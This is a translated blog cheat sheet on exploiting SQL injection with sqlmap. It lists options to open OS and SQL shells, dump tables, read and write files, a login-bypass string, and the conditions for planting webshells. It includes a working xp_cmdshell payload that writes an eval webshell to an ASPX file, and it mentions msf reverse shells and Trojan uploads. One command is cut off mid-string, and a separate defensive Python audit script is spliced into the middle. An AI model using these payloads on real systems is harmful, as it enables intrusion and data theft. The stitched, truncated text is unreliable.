SQL injection vulnerability exploitation

Exploitation of a vulnerability (sqlmap)

Database privilege escalation

1. A shell can be obtained directly, and it may come with system privileges:
sqlmap -d "mysql://root:root@ip/Database" --os-shell
2. For MySQL, use --sql-shell and then escalate privileges through a UDF

Universal password

' or 1=1 '

Database dump

-u              test the injection point (target URL)
--current-db    show the current database
--current-user  show the current user
--tables
--columns
--dump

Read and write files (requires file read/write privileges and depends on secure_file_priv)

--file-read   read a file from the target
--file-write  local file to upload (the argument is the path of the local shell file)
--file-dest   destination path on the target (the argument is the path on the compromised site)

Get webshell conditions

1. PHP + MySQL sites: conditions for getting a webshell
(1) MySQL root privileges: the account the site uses to connect to MySQL is root, or a non-root account that has root privileges.
(2) GPC (magic_quotes_gpc) is turned off, so single quotes can be used
(3) The absolute path of the site is known, and there is a folder with write permission
(4) secure-file-priv is not configured
2. MSSQL + ASP / ASP.NET sites: conditions for getting a webshell
(1) The database user is sa
(2) xp_cmdshell can be created; in some cases the sa account can connect but cannot use xp_cmdshell.
(3) The real path is known
(4) The shell can be generated with the echo command
Written directly at the injection point:
;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%^> > C:\WWW\233.aspx';--
From the command line:
echo ^<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"
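
Added example (not part of the original notes): a defender-side check of the MySQL conditions listed above, run against the account a web application uses. It goes slightly beyond the list by separating the three secure_file_priv states (NULL, empty, a directory). The function names and sample grants are assumptions made for illustration; the inputs are what SELECT CURRENT_USER(), SHOW GRANTS and SELECT @@secure_file_priv return, and POSIX-style paths are assumed.

```python
import re

# Global (*.*) grants in SHOW GRANTS output; FILE can only be granted globally.
GLOBAL_GRANT = re.compile(r"^GRANT\s+(.+?)\s+ON\s+\*\.\*\s+TO\s+", re.IGNORECASE)


def has_file_privilege(grants):
    """True if a SHOW GRANTS line gives FILE or ALL PRIVILEGES on *.*."""
    for line in grants:
        m = GLOBAL_GRANT.match(line.strip())
        if m and {p.strip().upper() for p in m.group(1).split(",")} & {
                "FILE", "ALL", "ALL PRIVILEGES"}:
            return True
    return False


def write_scope(secure_file_priv, webroot):
    """None (SQL NULL): disabled; '': unrestricted; otherwise one directory."""
    if secure_file_priv is None:
        return "disabled"
    if secure_file_priv == "":
        return "unrestricted"
    allowed = secure_file_priv.rstrip("/") + "/"
    root = webroot.rstrip("/") + "/"
    # Overlap in either direction means SQL-written files can be web-served.
    if root.startswith(allowed) or allowed.startswith(root):
        return "overlaps-webroot"
    return "restricted"


def audit(current_user, grants, secure_file_priv, webroot):
    """Findings for MySQL conditions (1), (3) and (4) in the list above."""
    findings = []
    if current_user.split("@")[0].strip("`'\"").lower() == "root":
        findings.append("application connects to MySQL as root")
    file_priv = has_file_privilege(grants)
    if file_priv:
        findings.append("account holds the global FILE privilege")
    scope = write_scope(secure_file_priv, webroot)
    if scope in ("unrestricted", "overlaps-webroot"):
        findings.append("secure_file_priv is " + scope)
        if file_priv:
            findings.append("EXPOSED: FILE privilege with a write scope reaching the web root")
    return findings

# Constructed sample inputs, not taken from a real server.
WEAK = audit("root@localhost",
             ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost'"], "", "/var/www/html")
print(WEAK)
```

An empty findings list means none of the checked conditions hold for that account; OS-level write permission on the web root is not checked here.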

Getting a webshell with sqlmap

1. --os-shell
(1) connect directly to the database (the database can be set to allow external users to log in)
(2) the absolute path is known, and the user has write permission
2. msf reverse shell (requires write permission and the path)
upload a Trojan file and have it connect back with a shell
3. Upload a shell
use the account and password obtained with sqlmap to log in to the admin backend and upload a shell

Origin www.cnblogs.com/lyxsalyd/p/12594697.html